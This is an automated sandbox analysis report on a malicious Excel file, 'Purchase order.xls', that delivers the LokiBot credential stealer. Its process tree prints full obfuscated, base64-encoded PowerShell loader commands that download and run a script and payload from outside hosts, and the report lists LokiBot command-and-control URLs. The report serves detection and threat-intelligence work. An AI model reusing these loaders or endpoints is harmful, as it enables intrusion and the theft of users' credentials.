Edit tour

Windows Analysis Report
Purchase order.xls

Overview

General Information

Sample name:	Purchase order.xls
Analysis ID:	1542327
MD5:	a8e1c0126304e8d65c0a30873dc3d830
SHA1:	a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256:	c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
Tags:	xlsuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected aPLib compressed binary

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Searches the installation path of Mozilla Firefox

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3556 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

mshta.exe (PID: 3848 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3944 cmdline: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 4056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 3316 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 1960 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 2640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" MD5: 045451FA238A75305CC26AC982472367)

powershell.exe (PID: 1668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 3804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

aspnet_regbrowsers.exe (PID: 3900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030)

mshta.exe (PID: 3164 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 1488 cmdline: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)

powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)

csc.exe (PID: 1944 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)

cvtres.exe (PID: 2520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

wscript.exe (PID: 2836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" MD5: 045451FA238A75305CC26AC982472367)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.220/simple/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: powershell.exe PID: 1668	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4072:$b2: ::FromBase64String( 0x4863:$b2: ::FromBase64String( 0xa30c:$b2: ::FromBase64String( 0xb83e:$b2: ::FromBase64String( 0xbecd:$b2: ::FromBase64String( 0xc693:$b2: ::FromBase64String( 0xccc9:$b2: ::FromBase64String( 0x1cf2:$b3: ::UTF8.GetString( 0x25f4:$b3: ::UTF8.GetString( 0x2e91:$b3: ::UTF8.GetString( 0x39cb:$b3: ::UTF8.GetString( 0x3e11:$b3: ::UTF8.GetString( 0x4602:$b3: ::UTF8.GetString( 0x85fa:$b3: ::UTF8.GetString( 0x902a:$b3: ::UTF8.GetString( 0x98d4:$b3: ::UTF8.GetString( 0xa0ab:$b3: ::UTF8.GetString( 0xb5dd:$b3: ::UTF8.GetString( 0xbc6c:$b3: ::UTF8.GetString( 0xc432:$b3: ::UTF8.GetString( 0xca68:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3804	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3804	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x23248:$b2: ::FromBase64String( 0x2c426:$b2: ::FromBase64String( 0x3c7ca:$b2: ::FromBase64String( 0x3d6f5:$b2: ::FromBase64String( 0x3edc4:$b2: ::FromBase64String( 0x3f234:$b2: ::FromBase64String( 0x6569e:$b2: ::FromBase64String( 0x65cea:$b2: ::FromBase64String( 0x6c082:$b2: ::FromBase64String( 0x6c6ad:$b2: ::FromBase64String( 0x75ab3:$b2: ::FromBase64String( 0x760df:$b2: ::FromBase64String( 0x7701c:$b2: ::FromBase64String( 0x7bce2:$b2: ::FromBase64String( 0x7c497:$b2: ::FromBase64String( 0x7d663:$b2: ::FromBase64String( 0x22fe7:$b3: ::UTF8.GetString( 0x2c1c5:$b3: ::UTF8.GetString( 0x3c580:$b3: ::UTF8.GetString( 0x3d4be:$b3: ::UTF8.GetString( 0x3eb95:$b3: ::UTF8.GetString(
Process Memory Space: aspnet_regbrowsers.exe PID: 3900	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_regbrowsers.exe PID: 3900	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_regbrowsers.exe PID: 3900	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xd8b1:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
26.2.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
